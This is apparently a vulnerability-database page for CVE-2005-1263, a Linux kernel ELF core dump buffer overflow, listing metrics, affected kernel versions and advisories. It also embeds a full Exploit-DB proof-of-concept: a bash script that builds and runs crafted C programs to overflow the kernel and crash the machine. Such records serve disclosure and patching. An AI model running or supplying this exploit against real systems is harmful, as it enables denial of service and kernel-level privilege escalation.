CVE-2005-1263 : Detail

CVE-2005-1263

0.06%V4
Local
2005-05-11
02h00 +00:00
2018-10-19
12h57 +00:00

CVE Descriptions

The elf_core_dump function in binfmt_elf.c for Linux kernel 2.x.x to 2.2.27-rc2, 2.4.x to 2.4.31-pre1, and 2.6.x to 2.6.12-rc4 allows local users to execute arbitrary code via an ELF binary that, in certain conditions involving the create_elf_tables function, causes a negative length argument to pass a signed integer comparison, leading to a buffer overflow.

CVE Information

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile therefore lets you compare one CVE's EPSS score against those of all other CVEs.

Exploit information

Exploit Database EDB-ID : 25647

Publication date : 2005-05-10 22h00 +00:00
Author : Paul Starzetz
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/13589/info The Linux kernel is susceptible to a local buffer-overflow vulnerability when attempting to create ELF coredumps. This issue is due to an integer-overflow flaw that results in a kernel buffer overflow during a 'copy_from_user()' call. To exploit this vulnerability, a malicious user creates a malicious ELF executable designed to create a negative 'len' variable in 'elf_core_dump()'. Local users may exploit this vulnerability to execute arbitrary machine code in the context of the kernel, facilitating privilege escalation. **Update: This vulnerability does not exist in the 2.6 kernel tree. */ #!/bin/bash # # elfcd.sh # warning: This code will crash your machine # cat <<__EOF__>elfcd1.c /* * Linux binfmt_elf core dump buffer overflow * * Copyright (c) 2005 iSEC Security Research. All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. 
* */ // phase 1 #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <unistd.h> #include <sys/time.h> #include <sys/resource.h> #include <asm/page.h> static char *env[10], *argv[4]; static char page[PAGE_SIZE]; static char buf[PAGE_SIZE]; void fatal(const char *msg) { if(!errno) { fprintf(stderr, "\nFATAL: %s\n", msg); } else { printf("\n"); perror(msg); } fflush(stdout); fflush(stderr); _exit(129); } int main(int ac, char **av) { int esp, i, r; struct rlimit rl; __asm__("movl %%esp, %0" : : "m"(esp)); printf("\n[+] %s argv_start=%p argv_end=%p ESP: 0x%x", av[0], av[0], av[ac-1]+strlen(av[ac-1]), esp); rl.rlim_cur = RLIM_INFINITY; rl.rlim_max = RLIM_INFINITY; r = setrlimit(RLIMIT_CORE, &rl); if(r) fatal("setrlimit"); memset(env, 0, sizeof(env) ); memset(argv, 0, sizeof(argv) ); memset(page, 'A', sizeof(page) ); page[PAGE_SIZE-1]=0; // move up env & exec phase 2 if(!strcmp(av[0], "AAAA")) { printf("\n[+] phase 2, <RET> to crash "); fflush(stdout); argv[0] = "elfcd2"; argv[1] = page; // term 0 counts! 
memset(buf, 0, sizeof(buf) ); for(i=0; i<789 + 4; i++) buf[i] = 'C'; argv[2] = buf; execve(argv[0], argv, env); _exit(127); } // move down env & reexec for(i=0; i<9; i++) env[i] = page; argv[0] = "AAAA"; printf("\n[+] phase 1"); fflush(stdout); execve(av[0], argv, env); return 0; } __EOF__ cat <<__EOF__>elfcd2.c // phase 2 #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <syscall.h> #include <sys/syscall.h> #include <asm/page.h> #define __NR_sys_read __NR_read #define __NR_sys_kill __NR_kill #define __NR_sys_getpid __NR_getpid char stack[4096 * 6]; static int errno; inline _syscall3(int, sys_read, int, a, void*, b, int, l); inline _syscall2(int, sys_kill, int, c, int, a); inline _syscall0(int, sys_getpid); // yeah, lets do it void killme() { char c='a'; int pid; pid = sys_getpid(); for(;;) { sys_read(0, &c, 1); sys_kill(pid, 11); } } // safe stack stub __asm__( " nop \n" "_start: movl \$0xbfff6ffc, %esp \n" " jmp killme \n" ".global _start \n" ); __EOF__ cat <<__EOF__>elfcd.ld OUTPUT_FORMAT("elf32-i386", "elf32-i386", "elf32-i386") OUTPUT_ARCH(i386) ENTRY(_start) SEARCH_DIR(/lib); SEARCH_DIR(/usr/lib); SEARCH_DIR(/usr/local/lib); SEARCH_DIR(/usr/i486-suse-linux/lib); MEMORY { ram (rwxali) : ORIGIN = 0xbfff0000, LENGTH = 0x8000 rom (x) : ORIGIN = 0xbfff8000, LENGTH = 0x10000 } PHDRS { headers PT_PHDR PHDRS ; text PT_LOAD FILEHDR PHDRS ; fuckme PT_LOAD AT (0xbfff8000) FLAGS (0x00) ; } SECTIONS { .dupa 0xbfff8000 : AT (0xbfff8000) { LONG(0xdeadbeef); _bstart = . ; . += 0x7000; } >rom :fuckme . = 0xbfff0000 + SIZEOF_HEADERS; .text : { *(.text) } >ram :text .data : { *(.data) } >ram :text .bss : { *(.dynbss) *(.bss) *(.bss.*) *(.gnu.linkonce.b.*) *(COMMON) . = ALIGN(32 / 8); } >ram :text } __EOF__ # compile & run echo -n "[+] Compiling..." gcc -O2 -Wall elfcd1.c -o elfcd1 gcc -O2 -nostdlib elfcd2.c -o elfcd2 -Xlinker -T elfcd.ld -static ./elfcd1

Products Mentioned

Configuration 0

Linux>>Linux_kernel >> Version 2.2.0

Linux>>Linux_kernel >> Version 2.2.1

Linux>>Linux_kernel >> Version 2.2.2

Linux>>Linux_kernel >> Version 2.2.3

Linux>>Linux_kernel >> Version 2.2.4

Linux>>Linux_kernel >> Version 2.2.5

Linux>>Linux_kernel >> Version 2.2.6

Linux>>Linux_kernel >> Version 2.2.7

Linux>>Linux_kernel >> Version 2.2.8

Linux>>Linux_kernel >> Version 2.2.9

Linux>>Linux_kernel >> Version 2.2.10

Linux>>Linux_kernel >> Version 2.2.11

Linux>>Linux_kernel >> Version 2.2.12

Linux>>Linux_kernel >> Version 2.2.13

Linux>>Linux_kernel >> Version 2.2.14

Linux>>Linux_kernel >> Version 2.2.15

Linux>>Linux_kernel >> Version 2.2.16

Linux>>Linux_kernel >> Version 2.2.17

Linux>>Linux_kernel >> Version 2.2.18

Linux>>Linux_kernel >> Version 2.2.19

Linux>>Linux_kernel >> Version 2.2.20

Linux>>Linux_kernel >> Version 2.2.21

Linux>>Linux_kernel >> Version 2.2.22

Linux>>Linux_kernel >> Version 2.2.23

Linux>>Linux_kernel >> Version 2.2.24

Linux>>Linux_kernel >> Version 2.2.27

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.1

Linux>>Linux_kernel >> Version 2.4.2

Linux>>Linux_kernel >> Version 2.4.3

Linux>>Linux_kernel >> Version 2.4.4

Linux>>Linux_kernel >> Version 2.4.5

Linux>>Linux_kernel >> Version 2.4.6

Linux>>Linux_kernel >> Version 2.4.7

Linux>>Linux_kernel >> Version 2.4.8

Linux>>Linux_kernel >> Version 2.4.9

Linux>>Linux_kernel >> Version 2.4.10

Linux>>Linux_kernel >> Version 2.4.11

Linux>>Linux_kernel >> Version 2.4.12

Linux>>Linux_kernel >> Version 2.4.13

Linux>>Linux_kernel >> Version 2.4.14

Linux>>Linux_kernel >> Version 2.4.15

Linux>>Linux_kernel >> Version 2.4.16

Linux>>Linux_kernel >> Version 2.4.17

Linux>>Linux_kernel >> Version 2.4.18

Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.19

    Linux>>Linux_kernel >> Version 2.4.19

    Linux>>Linux_kernel >> Version 2.4.19

    Linux>>Linux_kernel >> Version 2.4.19

    Linux>>Linux_kernel >> Version 2.4.19

    Linux>>Linux_kernel >> Version 2.4.19

    Linux>>Linux_kernel >> Version 2.4.19

    Linux>>Linux_kernel >> Version 2.4.20

    Linux>>Linux_kernel >> Version 2.4.21

    Linux>>Linux_kernel >> Version 2.4.21

    Linux>>Linux_kernel >> Version 2.4.21

    Linux>>Linux_kernel >> Version 2.4.21

    Linux>>Linux_kernel >> Version 2.4.22

    Linux>>Linux_kernel >> Version 2.4.23

    Linux>>Linux_kernel >> Version 2.4.23

    Linux>>Linux_kernel >> Version 2.4.23_ow2

      Linux>>Linux_kernel >> Version 2.4.24

      Linux>>Linux_kernel >> Version 2.4.24_ow1

        Linux>>Linux_kernel >> Version 2.4.25

        Linux>>Linux_kernel >> Version 2.4.26

        Linux>>Linux_kernel >> Version 2.4.27

        Linux>>Linux_kernel >> Version 2.4.27

        Linux>>Linux_kernel >> Version 2.4.27

        Linux>>Linux_kernel >> Version 2.4.27

        Linux>>Linux_kernel >> Version 2.4.27

        Linux>>Linux_kernel >> Version 2.4.27

        Linux>>Linux_kernel >> Version 2.4.28

        Linux>>Linux_kernel >> Version 2.4.29

        Linux>>Linux_kernel >> Version 2.4.30

        Linux>>Linux_kernel >> Version 2.4.31

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.1

        Linux>>Linux_kernel >> Version 2.6.1

        Linux>>Linux_kernel >> Version 2.6.1

        Linux>>Linux_kernel >> Version 2.6.2

        Linux>>Linux_kernel >> Version 2.6.3

        Linux>>Linux_kernel >> Version 2.6.4

        Linux>>Linux_kernel >> Version 2.6.5

        Linux>>Linux_kernel >> Version 2.6.6

        Linux>>Linux_kernel >> Version 2.6.6

        Linux>>Linux_kernel >> Version 2.6.7

        Linux>>Linux_kernel >> Version 2.6.7

        Linux>>Linux_kernel >> Version 2.6.8

        Linux>>Linux_kernel >> Version 2.6.8

        Linux>>Linux_kernel >> Version 2.6.8

        Linux>>Linux_kernel >> Version 2.6.8

        Linux>>Linux_kernel >> Version 2.6.9

          Linux>>Linux_kernel >> Version 2.6.10

          Linux>>Linux_kernel >> Version 2.6.10

          Linux>>Linux_kernel >> Version 2.6.11

          Linux>>Linux_kernel >> Version 2.6.12

          Linux>>Linux_kernel >> Version 2.6_test9_cvs

            References

            http://www.vupen.com/english/advisories/2005/0524
            Tags : vdb-entry, x_refsource_VUPEN
            http://secunia.com/advisories/19185
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://secunia.com/advisories/19607
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://www.securityfocus.com/archive/1/428058/100/0/threaded
            Tags : vendor-advisory, x_refsource_FEDORA
            http://www.redhat.com/support/errata/RHSA-2005-472.html
            Tags : vendor-advisory, x_refsource_REDHAT
            http://www.securityfocus.com/bid/13589
            Tags : vdb-entry, x_refsource_BID
            http://www.securityfocus.com/archive/1/397966
            Tags : mailing-list, x_refsource_BUGTRAQ
            http://www.securityfocus.com/archive/1/428028/100/0/threaded
            Tags : vendor-advisory, x_refsource_FEDORA
            http://www.redhat.com/support/errata/RHSA-2005-551.html
            Tags : vendor-advisory, x_refsource_REDHAT
            http://www.redhat.com/support/errata/RHSA-2005-529.html
            Tags : vendor-advisory, x_refsource_REDHAT
            http://www.securityfocus.com/archive/1/427980/100/0/threaded
            Tags : vendor-advisory, x_refsource_FEDORA